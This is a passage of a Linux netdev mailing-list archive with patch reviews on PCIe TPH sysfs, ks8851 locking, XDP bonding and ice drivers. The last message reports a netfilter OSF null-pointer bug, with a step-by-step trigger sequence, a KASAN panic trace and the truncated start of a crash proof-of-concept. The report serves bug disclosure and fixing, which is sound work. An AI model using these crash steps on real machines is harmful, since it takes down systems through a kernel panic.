* Re: [RFC] Proposal: Add sysfs interface for PCIe TPH Steering Tag retrieval and configuration
From: Leon Romanovsky @ 2026-04-14 8:57 UTC (permalink / raw)
To: fengchengwen
Cc: Jason Gunthorpe, Bjorn Helgaas, linux-rdma, linux-pci, netdev,
dri-devel, Keith Busch, Yochai Cohen, Yishai Hadas, Zhiping Zhang
In-Reply-To: <b95ced54-339f-4859-b3eb-8bf261393ffc@huawei.com>
On Tue, Apr 14, 2026 at 09:07:23AM +0800, fengchengwen wrote:
> On 4/14/2026 3:19 AM, Leon Romanovsky wrote:
> > On Mon, Apr 13, 2026 at 08:04:10PM +0800, fengchengwen wrote:
> >> On 4/13/2026 6:01 PM, Leon Romanovsky wrote:
> >>> On Fri, Apr 10, 2026 at 10:30:52PM +0800, fengchengwen wrote:
> >>>> Hi all,
> >>>>
> >>>> I'm writing to propose adding a sysfs interface to expose and configure the
> >>>> PCIe TPH
> >>>> Steering Tag for PCIe devices, which is retrieved inside the kernel.
> >>>>
> >>>>
> >>>> Background: The TPH Steering Tag is tightly coupled with both a PCIe device
> >>>> (identified
> >>>> by its BDF) and a CPU core. It can only be obtained in kernel mode. To allow
> >>>> user-space
> >>>> applications to fetch and set this value securely and conveniently, we need
> >>>> a standard
> >>>> kernel-to-user interface.
> >>>>
> >>>>
> >>>> Proposed Solution: Add several sysfs attributes under each PCIe device's
> >>>> sysfs directory:
> >>>> 1. /sys/bus/pci/devices/<BDF>/tph_mode to query the TPH mode (interrupt or
> >>>> device specific)
> >>>> 2. /sys/bus/pci/devices/<BDF>/tph_enable to control the TPH feature
> >>>> 3. /sys/bus/pci/devices/<BDF>/tph_st to support both read and write
> >>>> operations, e.g.:
> >>>> Read operation:
> >>>> echo "cpu=3" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> cat /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>> Write operation:
> >>>> echo "index=10 st=123" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>>
> >>>>
> >>>> The design strictly follows PCI subsystem sysfs standards and has the
> >>>> following key properties:
> >>>>
> >>>> 1. Dynamic Visibility: The sysfs attributes will only be present for PCIe
> >>>> devices that
> >>>> support TPH Steering Tag. Devices without TPH capability will not show
> >>>> these nodes,
> >>>> avoiding unnecessary user confusion.
> >>>>
> >>>> 2. Permission Control: The attributes will use 0600 file permissions,
> >>>> ensuring only
> >>>> privileged root users can read or write them, which satisfies security
> >>>> requirements
> >>>> for hardware configuration interfaces.
> >>>>
> >>>> 3. Standard Implementation Location: The interface will be implemented in
> >>>> drivers/pci/pci-sysfs.c, the canonical location for all PCI device sysfs
> >>>> attributes,
> >>>> ensuring consistency and maintainability within the PCI subsystem.
> >>>>
> >>>>
> >>>> Why sysfs instead of alternatives like VFIO-PCI ioctl:
> >>>>
> >>>> - Universality: sysfs does not require binding the device to a special
> >>>> driver such as
> >>>> vfio-pci. It is available to any privileged user-space component,
> >>>> including system
> >>>> utilities, daemons, and monitoring tools.
> >>>>
> >>>> - Simplicity: Both user-space usage (cat/echo) and kernel implementation are
> >>>> straightforward, reducing code complexity and long-term maintenance cost.
> >>>>
> >>>> - Design Alignment: TPH Steering Tag is a generic PCIe device feature, not
> >>>> specific to
> >>>> user-space drivers like DPDK or VFIO. Exposing it via sysfs matches the
> >>>> kernel's
> >>>> standard pattern for hardware capabilities.
> >>>>
> >>>>
> >>>> I look forward to your comments about this design before submitting the
> >>>> final patch.
> >>>
> >>> You need to explain more clearly why this write functionality is useful
> >>> and necessary outside the VFIO/RDMA context:
> >>> https://lore.kernel.org/all/20260324234615.3731237-1-zhipingz@meta.com/
> >>>
> >>> AFAIK, for non-VFIO TPH callers, kernel has enough knowledge to set
> >>> right ST values.
> >>>
> >>> There are several comments regarding the implementation, but those can wait
> >>> until the rationale behind the proposal is fully clarified.
> >>
> >> Thanks for your review and comments.
> >>
> >> Let me clarify the rationale behind this user-space sysfs interface:
> >>
> >> 1. VFIO is just one of the user-space device access frameworks.
> >> There are many other in-kernel frameworks that expose devices
> >> to user space, such as UIO, UACCE, etc., which may also require
> >> TPH Steering Tag support.
> >>
> >> 2. The kernel can automatically program Steering Tags only when
> >> the device provides a standard ST table in MSI-X or config space.
> >> However, many devices implement vendor-specific or platform-specific
> >> Steering Tag programming methods that cannot be fully handled
> >> by the generic kernel code.
> >>
> >> 3. For such devices, user-space applications or framework drivers
> >> need to retrieve and configure TPH Steering Tags directly.
> >> A unified sysfs interface allows all user-space frameworks
> >> (not just VFIO) to use a common, standard way to manage
> >> TPH Steering Tags, rather than implementing duplicated logic
> >> in each subsystem.
> >>
> >> This interface provides a uniform method for any user-space
> >> device access solution to work with TPH, which is why I believe
> >> it is useful and necessary beyond the VFIO/RDMA case.
> >
> > I understand the rationale for providing a read interface, for example for
> > debugging, but I do not see any justification for a write interface.
>
> Thank you for the comment!
>
> As I explained, read interface is not only for debugging. It was used to
> such device who don't declare ST location in MSI-X or config-space, the following
> is Intel X710 NIC device's lspci output (only TPH part):
>
> Capabilities: [1a0 v1] Transaction Processing Hints
> Device specific mode supported
> No steering table available
>
> So we could not config the ST for device on kernel because it's vendor specific.
> But we could configure ST by it's vendor user-space driver, in this case, we
> should get ST from kernel to user-space.
Vendor-specific, in the context of the PCI specification, does not mean the
kernel cannot configure it. It simply means that the ST values are not
stored in the ST table.
Thanks
^ permalink raw reply
* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Sebastian Andrzej Siewior @ 2026-04-14 8:55 UTC (permalink / raw)
To: Marek Vasut
Cc: Jakub Kicinski, netdev, stable, David S. Miller, Andrew Lunn,
Eric Dumazet, Nicolai Buchwitz, Paolo Abeni, Ronald Wahl,
Yicong Hui, linux-kernel, Thomas Gleixner
In-Reply-To: <20260413160336.GQCaw-1d@linutronix.de>
On 2026-04-13 18:03:38 [+0200], To Marek Vasut wrote:
> On 2026-04-13 17:31:34 [+0200], Marek Vasut wrote:
> > > I don't see why it needs to disable interrupts.
> >
> > Because when the lock is held, the PAR code shouldn't be interrupted by an
> > interrupt, otherwise it would completely mess up the state of the KS8851
> > MAC. The spinlock does not protect only the IRQ handler, it protects also
> > ks8851_start_xmit_par() and ks8851_write_mac_addr() and
> > ks8851_read_mac_addr() and ks8851_net_open() and ks8851_net_stop() and other
> > sites which call ks8851_lock()/ks8851_unlock() which cannot be executed
> > concurrently, but where BHs can be enabled.
>
> I need check this once brain is at full power again. But which
> interrupt? Your interrupt is threaded. So that should be okay.
I don't understand. There is no point in using spin_lock_irqsave() in
ks8851_lock_par(). You don't protect against interrupts because none of
the user actually run in an interrupt. As far as I can see, the
interrupt is threaded and the mdio phy link checks should come from the
workqueue.
What is wrong is that the ndo_start_xmit callback can be invoked from a
softirq and such you must disable BHs while acquiring a lock which can
be accessed from both contexts. Therefore spin_lock() is not sufficient,
it needs the _bh() and _irq() brings no additional value here.
Sebastian
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:55 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <20260414083703.2531953-1-hxzene@gmail.com>
On Tue, Apr 14, 2026 at 04:37:02PM +0800, Kito Xu (veritas501) wrote:
> From: Kito Xu <hxzene@gmail.com>
>
> Hi Pablo,
>
> On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> > How could skb->dev be NULL !?
>
> skb->dev is NOT NULL. The NULL value is `in_dev` returned by
> __in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
> inetdev_destroy().
More detailed report helps.
> > This is run from prerouting, input and forward.
>
> Correct. The crash path is in PREROUTING on lo.
>
> > I cannot believe this, I think AI is mocking KASAN splat, if that is
> > the case, I am sorry to say, but it is too bad if you are doing this.
>
> This is a real bug with a reproducible PoC. I understand the KASAN
> output in my original patch email looked suspicious because it was
> interleaved with the PoC's stderr output (the PoC prints debug lines
> while the kernel oops scrolls by simultaneously). That was a formatting
> mistake on my part.
No need for PoC, just a bit more details is enough.
Thanks for explaining.
^ permalink raw reply
* Re: [PATCH net v7 1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
From: Paolo Abeni @ 2026-04-14 8:53 UTC (permalink / raw)
To: Jiayuan Chen, netdev, Daniel Borkmann
Cc: syzbot+80e046b8da2820b6ba73, Martin KaFai Lau, John Fastabend,
Stanislav Fomichev, Alexei Starovoitov, Andrii Nakryiko,
Eduard Zingerman, Song Liu, Yonghong Song, KP Singh, Hao Luo,
Jiri Olsa, David S. Miller, Eric Dumazet, Jakub Kicinski,
Simon Horman, Jesper Dangaard Brouer, Shuah Khan, Jussi Maki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-2-jiayuan.chen@linux.dev>
On 4/11/26 2:55 AM, Jiayuan Chen wrote:
> syzkaller reported a kernel panic in bond_rr_gen_slave_id() reached via
> xdp_master_redirect(). Full decoded trace:
>
> https://syzkaller.appspot.com/bug?extid=80e046b8da2820b6ba73
>
> bond_rr_gen_slave_id() dereferences bond->rr_tx_counter, a per-CPU
> counter that bonding only allocates in bond_open() when the mode is
> round-robin. If the bond device was never brought up, rr_tx_counter
> stays NULL.
>
> The XDP redirect path can still reach that code on a bond that was
> never opened: bpf_master_redirect_enabled_key is a global static key,
> so as soon as any bond device has native XDP attached, the
> XDP_TX -> xdp_master_redirect() interception is enabled for every
> slave system-wide. The path xdp_master_redirect() ->
> bond_xdp_get_xmit_slave() -> bond_xdp_xmit_roundrobin_slave_get() ->
> bond_rr_gen_slave_id() then runs against a bond that has no
> rr_tx_counter and crashes.
>
> Fix this in the generic xdp_master_redirect() by refusing to call into
> the master's ->ndo_xdp_get_xmit_slave() when the master device is not
> up. IFF_UP is only set after ->ndo_open() has successfully returned,
> so this reliably excludes masters whose XDP state has not been fully
> initialized. Drop the frame with XDP_ABORTED so the exception is
> visible via trace_xdp_exception() rather than silently falling through.
> This is not specific to bonding: any current or future master that
> defers XDP state allocation to ->ndo_open() is protected.
>
> Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
> Reported-by: syzbot+80e046b8da2820b6ba73@syzkaller.appspotmail.com
> Closes: https://lore.kernel.org/all/698f84c6.a70a0220.2c38d7.00cc.GAE@google.com/T/
> Suggested-by: Daniel Borkmann <daniel@iogearbox.net>
> Acked-by: Daniel Borkmann <daniel@iogearbox.net>
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
> net/core/filter.c | 2 ++
> 1 file changed, 2 insertions(+)
>
> diff --git a/net/core/filter.c b/net/core/filter.c
> index cf2113af4bc9..9ec70c4b7723 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -4398,6 +4398,8 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
> struct net_device *master, *slave;
>
> master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
> + if (unlikely(!(master->flags & IFF_UP)))
> + return XDP_ABORTED;
> slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
The AI review noted that the master could be (theoretically) NULL here.
Since that event is not a regression (unconditional `master` dereference
already present) and syzkaller failed to trigger it (despite being the
sort of thing syzkaller is very good to find) make me thing it's better
to eventually follow-up instead requesting another revision here, but
please have a look.
Thanks,
Paolo
> if (slave && slave != xdp->rxq->dev) {
> /* The target device is different from the receiving device, so
^ permalink raw reply
* Re: [PATCH iwl-next 1/10] ice: translate FW to SW for max num TCs encoding
From: Simon Horman @ 2026-04-14 8:44 UTC (permalink / raw)
To: Aleksandr Loktionov
Cc: intel-wired-lan, anthony.l.nguyen, netdev, Dave Ertman
In-Reply-To: <20260410074921.1254213-2-aleksandr.loktionov@intel.com>
On Fri, Apr 10, 2026 at 09:49:12AM +0200, Aleksandr Loktionov wrote:
> From: Dave Ertman <david.m.ertman@intel.com>
>
> The FW uses a 3-bit field in a TLV to represent the maximum number of
> Traffic Classes supported per interface. Since the maximum value is 8,
> and at least one TC must be supported, the encoding uses bit values of
> 000 to represent 8 TCs.
>
> The driver currently does not translate this value and reports 0 max TCs
> to the DCBNL interface instead of 8.
>
> Add a translation when interfacing with the FW to use 0x0 as the value
> for 8 max TCs.
>
> Signed-off-by: Dave Ertman <david.m.ertman@intel.com>
> Signed-off-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
I'm not sure if you want to reconsider this as a bug fix.
But the code changes look good to me.
Reviewed-by: Simon Horman <horms@kernel.org>
^ permalink raw reply
* RE: [PATCH iwl-net] ice: fix infinite recursion in ice_cfg_tx_topo via ice_init_dev_hw
From: Loktionov, Aleksandr @ 2026-04-14 8:43 UTC (permalink / raw)
To: Oros, Petr, netdev@vger.kernel.org
Cc: Oros, Petr, Nguyen, Anthony L, Kitszel, Przemyslaw, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Nikolay Aleksandrov, Daniel Zahka, Greenwalt, Paul,
Ertman, David M, Michal Swiatkowski, Keller, Jacob E,
intel-wired-lan@lists.osuosl.org, linux-kernel@vger.kernel.org
In-Reply-To: <20260413191420.3524013-1-poros@redhat.com>
> -----Original Message-----
> From: Petr Oros <poros@redhat.com>
> Sent: Monday, April 13, 2026 9:14 PM
> To: netdev@vger.kernel.org
> Cc: Oros, Petr <poros@redhat.com>; Nguyen, Anthony L
> <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw
> <przemyslaw.kitszel@intel.com>; Andrew Lunn <andrew+netdev@lunn.ch>;
> David S. Miller <davem@davemloft.net>; Eric Dumazet
> <edumazet@google.com>; Jakub Kicinski <kuba@kernel.org>; Paolo Abeni
> <pabeni@redhat.com>; Loktionov, Aleksandr
> <aleksandr.loktionov@intel.com>; Nikolay Aleksandrov
> <razor@blackwall.org>; Daniel Zahka <daniel.zahka@gmail.com>;
> Greenwalt, Paul <paul.greenwalt@intel.com>; Ertman, David M
> <david.m.ertman@intel.com>; Michal Swiatkowski
> <michal.swiatkowski@linux.intel.com>; Keller, Jacob E
> <jacob.e.keller@intel.com>; intel-wired-lan@lists.osuosl.org; linux-
> kernel@vger.kernel.org
> Subject: [PATCH iwl-net] ice: fix infinite recursion in
> ice_cfg_tx_topo via ice_init_dev_hw
>
> On certain E810 configurations where firmware supports Tx scheduler
> topology switching (tx_sched_topo_comp_mode_en), ice_cfg_tx_topo() may
> need to apply a new 5-layer or 9-layer topology from the DDP package.
> If the AQ command to set the topology fails (e.g. due to invalid DDP
> data or firmware limitations), the global configuration lock must
> still be cleared via a CORER reset.
>
> Commit 86aae43f21cf ("ice: don't leave device non-functional if Tx
> scheduler config fails") correctly fixed this by refactoring
> ice_cfg_tx_topo() to always trigger CORER after acquiring the global
> lock and re-initialize hardware via ice_init_hw() afterwards.
>
> However, commit 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end
> of deinit paths") later moved ice_init_dev_hw() into ice_init_hw(),
> breaking the reinit path introduced by 86aae43f21cf. This creates an
> infinite recursive call chain:
>
> ice_init_hw()
> ice_init_dev_hw()
> ice_cfg_tx_topo() # topology change needed
> ice_deinit_hw()
> ice_init_hw() # reinit after CORER
> ice_init_dev_hw() # recurse
> ice_cfg_tx_topo()
> ... # stack overflow
>
> Fix by moving ice_init_dev_hw() back out of ice_init_hw() and calling
> it explicitly from ice_probe() and ice_devlink_reinit_up(). The third
> caller, ice_cfg_tx_topo(), intentionally does not need
> ice_init_dev_hw() during its reinit, it only needs the core HW
> reinitialization. This breaks the recursion cleanly without adding
> flags or guards.
>
> The deinit ordering changes from commit 8a37f9e2ff40 ("ice: move
> ice_deinit_dev() to the end of deinit paths") which fixed slow rmmod
> are preserved, only the init-side placement of ice_init_dev_hw() is
> reverted.
>
> Fixes: 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end of deinit
> paths")
> Signed-off-by: Petr Oros <poros@redhat.com>
> ---
> drivers/net/ethernet/intel/ice/devlink/devlink.c | 2 ++
> drivers/net/ethernet/intel/ice/ice_common.c | 2 --
> drivers/net/ethernet/intel/ice/ice_main.c | 2 ++
> 3 files changed, 4 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> index 6144cee8034d77..641d6e289d5ce6 100644
> --- a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> +++ b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> @@ -1245,6 +1245,8 @@ static int ice_devlink_reinit_up(struct ice_pf
> *pf)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> /* load MSI-X values */
> ice_set_min_max_msix(pf);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_common.c
> b/drivers/net/ethernet/intel/ice/ice_common.c
> index ce11fea122d03e..b617a6bff89134 100644
> --- a/drivers/net/ethernet/intel/ice/ice_common.c
> +++ b/drivers/net/ethernet/intel/ice/ice_common.c
> @@ -1126,8 +1126,6 @@ int ice_init_hw(struct ice_hw *hw)
> if (status)
> goto err_unroll_fltr_mgmt_struct;
>
> - ice_init_dev_hw(hw->back);
> -
> mutex_init(&hw->tnl_lock);
> ice_init_chk_recipe_reuse_support(hw);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_main.c
> b/drivers/net/ethernet/intel/ice/ice_main.c
> index e2a5534819d194..a27be29f9bbbfc 100644
> --- a/drivers/net/ethernet/intel/ice/ice_main.c
> +++ b/drivers/net/ethernet/intel/ice/ice_main.c
> @@ -5314,6 +5314,8 @@ ice_probe(struct pci_dev *pdev, const struct
> pci_device_id __always_unused *ent)
> return err;
> }
>
> + ice_init_dev_hw(pf);
> +
> adapter = ice_adapter_get(pdev);
> if (IS_ERR(adapter)) {
> err = PTR_ERR(adapter);
> --
> 2.52.0
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Kito Xu (veritas501) @ 2026-04-14 8:37 UTC (permalink / raw)
To: pablo
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, hxzene, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <ad35LhIOSaEDJAhS@chamomile>
From: Kito Xu <hxzene@gmail.com>
Hi Pablo,
On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> How could skb->dev be NULL !?
skb->dev is NOT NULL. The NULL value is `in_dev` returned by
__in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
inetdev_destroy().
> This is run from prerouting, input and forward.
Correct. The crash path is in PREROUTING on lo.
> I cannot believe this, I think AI is mocking KASAN splat, if that is
> the case, I am sorry to say, but it is too bad if you are doing this.
This is a real bug with a reproducible PoC. I understand the KASAN
output in my original patch email looked suspicious because it was
interleaved with the PoC's stderr output (the PoC prints debug lines
while the kernel oops scrolls by simultaneously). That was a formatting
mistake on my part.
Let me clarify the root cause and provide a clean KASAN report.
## Root Cause
nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
to in_dev_for_each_ifa_rcu() without a NULL check:
static inline int nf_osf_ttl(const struct sk_buff *skb,
int ttl_check, unsigned char f_ttl)
{
struct in_device *in_dev = __in_dev_get_rcu(skb->dev);
...
/* ttl_check == NF_OSF_TTL_LESS, ip->ttl > f_ttl → falls through */
in_dev_for_each_ifa_rcu(ifa, in_dev) { /* NULL deref when in_dev == NULL */
...
in_dev_for_each_ifa_rcu expands to:
for (ifa = rcu_dereference((in_dev)->ifa_list); ...)
When in_dev is NULL, (NULL)->ifa_list is a NULL dereference at offset
0x10, which matches the KASAN report: null-ptr-deref in range
[0x0000000000000010-0x0000000000000017].
## How ip_ptr becomes NULL
The loopback driver (loopback.c) does NOT call ether_setup(), so
dev->min_mtu remains 0. This allows setting MTU below IPV4_MIN_MTU
(68). Setting lo MTU to 67 triggers:
NETDEV_CHANGEMTU event
→ inetdev_valid_mtu(67) == false
→ inetdev_destroy(in_dev)
→ RCU_INIT_POINTER(dev->ip_ptr, NULL)
After this, lo can still receive packets (loopback_xmit → __netif_rx),
but __in_dev_get_rcu(lo) returns NULL.
## Trigger sequence
1. Load OSF fingerprint (genre=Linux, ttl=64, ttl_check=TTL_LESS)
2. Set up iptables raw PREROUTING rule with xt_osf match
3. Set lo MTU to 67 → inetdev_destroy → ip_ptr = NULL
4. Inject SYN (TTL=255 > f_ttl 64) via AF_PACKET on lo
5. ip_rcv → PREROUTING → xt_osf → nf_osf_ttl() → NULL deref
## Clean KASAN report (from separate capture, no interleaving)
```
[ 2.873592] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN NOPTI
[ 2.878162] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 2.881836] CPU: 0 UID: 0 PID: 169 Comm: poc Not tainted 7.0.0-rc7-next-20260410+ #11 PREEMPTLAZY
[ 2.885160] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 2.889197] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 2.891768] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 2.898548] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 2.900439] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 2.903090] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 2.906785] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 2.909418] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 2.912058] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 2.914978] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 2.917975] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.920236] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 2.922952] Call Trace:
[ 2.923947] <IRQ>
[ 2.924779] nf_osf_match+0x2f8/0x780
[ 2.926183] ? __pfx_nf_osf_match+0x10/0x10
[ 2.928630] ? kvm_sched_clock_read+0x11/0x20
[ 2.930946] ? local_clock+0x15/0x30
[ 2.933963] ? kasan_save_track+0x26/0x60
[ 2.936266] ? __pfx__raw_spin_lock+0x10/0x10
[ 2.938605] xt_osf_match_packet+0x11c/0x1f0
[ 2.940360] len=40ipt_do_table+0x7fe/0x12b0
[ 2.942846] ? __pfx_ipt_do_table+0x10/0x10
[ 2.944267] ? __pfx___smp_call_single_queue+0x10/0x10
[ 2.946109] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10
[ 2.949929] nf_hook_slow+0xac/0x1e0
[ 2.951288] ip_rcv+0x123/0x370
[ 2.952544] ? __pfx_ip_rcv+0x10/0x10
[ 2.954789] ? tryinc_node_nr_active+0xe6/0x160
[ 2.956407] ?netif_r __pfx_ip_rcv_finish+0x10/0x10
[ 2.958990] ? __smp_call_single_queue+0x2c7/0x480
[ 2.960907] ? __pfx_ip_rcv+0x10/0x10
[ 2.962315] __netif_receive_skb_one_core+0x166/0x1b0
[ 2.964374] ? __pfx___netif_receive_skb_one_core+0x10/0x10
[ 2.966465] ? _raw_spin_lock_irq+0x8a/0xe0
[ 2.968828] ? update_cfs_rq_load_avg+0x5a/0x560
[ 2.970585] process_backlog+0x197/0x590
[ 2.973489] __napi_poll+0xa1/0x540
[ 2.974887] net_rx_action+0x401/0xd80
[ 2.976358] ? __pfx_net_rx_action+0x10/0x10
[ 2.977973] ? timerqueue_linked_add+0x1f4/0x3d0
[ 2.980634] handle_softirqs+0x19f/0x610
[ 2.982012] pfx_handle_softirqs+0x10/0x10
[ 2.984853] do_softirq.part.0+0x3b/0x60
[ 2.986360] </IRQ>
[ 2.987161] <TASK>
[ 2.987845] __local_bh_enable_ip+0x64/0x70
[ 2.989320] __dev_queue_xmit+0x9f7/0x3100
[ 2.990853] ? kvm_clock_get_cycles+0x18/0x30
[ 2.992377] ? ktime_get+0xeb/0x160
[ 2.994640] ? __pfx_skb_set_owner_w+0x10/0x10
[ 2.996116] ? __pfx___dev_queue_xmit+0x10/0x10
[ 2.997850] ? __pfx__copy_from_iter+0x10/0x10
[ 2.999529] ? packet_parse_headers+0x342/0x6b0
[ 3.002132] ? __pfx_packet_parse_headers+0x10/0x10
[ 3.003983] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.005551] packet_sendmsg+0x21c2/0x5580
[ 3.007039] ? tty_compat_ioctl+0x238/0x500
[ 3.008445] ? __pfx_ldsem_down_read+0x10/0x10
[ 3.010973] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.012634] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 3.014620] ? __pfx_packet_sendmsg+0x10/0x10
[ 3.016292] ? __pfx_aa_sk_perm+0x10/0x10
[ 3.017657] ? __check_object_size+0x4b/0x650
[ 3.019888] __sys_sendto+0x34e/0x3a0
[ 3.021353] ? __pfx___sys_sendto+0x10/0x10
[ 3.022854] ? alloc_fd+0x33b/0x5b0
[ 3.024081] ? ksys_write+0xfc/0x1d0
[ 3.025333] ? __pfx_ksys_write+0x10/0x10
[ 3.027069] __x64_sys_sendto+0xe0/0x1c0
[ 3.028593] do_syscall_64+0x64/0x680
[ 3.030069] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 3.032055] RIP: 0033:0x4243f7
[ 3.033269] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 6d bc 08 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0
[ 3.039978] RSP: 002b:00007ffc7ab0e508 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[ 3.042801] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00000000004243f7
[ 3.045585] RDX: 0000000000000036 RSI: 00007ffc7ab0e590 RDI: 0000000000000003
[ 3.048006] RBP: 00007ffc7ab0e5d0 R08: 00007ffc7ab0e540 R09: 0000000000000014
[ 3.050552] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffc7ab0e6f8
[ 3.053184] R13: 00007ffc7ab0e708 R14: 00000000004aaf68 R15: 0000000000000001
[ 3.055872] </TASK>
[ 3.056758] Modules linked in:
[ 3.057796] ---[ end trace 0000000000000000 ]---
[ 3.059605] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 3.061034] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 3.067353] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 3.069348] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 3.072135] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 3.074613] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 3.076982] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 3.079532] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 3.082213] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 3.085348] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.087128] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 3.089429] Kernel panic - not syncing: Fatal exception in interrupt
[ 3.092322] Kernel Offset: disabled
[ 3.093649] Rebooting in 1 seconds..
```
## PoC (standalone C, requires root, compiles with musl or glibc)
```c
/*
* PoC: nf_osf_ttl() NULL pointer dereference (nfnetlink_osf.c)
*
* Trigger: lo MTU set to 67 (< IPV4_MIN_MTU=68) via ioctl
* → NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → inetdev_destroy(lo) → RCU_INIT_POINTER(lo->ip_ptr, NULL)
*
* SYN injected via AF_PACKET on lo → loopback_xmit
* → eth_type_trans → __netif_rx → ip_rcv → PREROUTING
* → xt_osf → nf_osf_match → nf_osf_match_one
* → nf_osf_ttl(skb, TTL_LESS=1, f_ttl=64)
* L34: in_dev = __in_dev_get_rcu(lo) → NULL
* L46: in_dev_for_each_ifa_rcu(ifa, NULL) → CRASH
*
* Requirements (all built-in in target kernel):
* CONFIG_IP_NF_RAW=y, CONFIG_NETFILTER_XT_MATCH_OSF=y,
* CONFIG_NETFILTER_NETLINK_OSF=y, CONFIG_PANIC_ON_OOPS=y
*
* Run as root.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <linux/netlink.h>
/* ------------------------------------------------------------------ */
/* Inline definitions — avoid dependency on kernel UAPI headers */
/* ------------------------------------------------------------------ */
/* netlink / netfilter */
#define NETLINK_NETFILTER 12
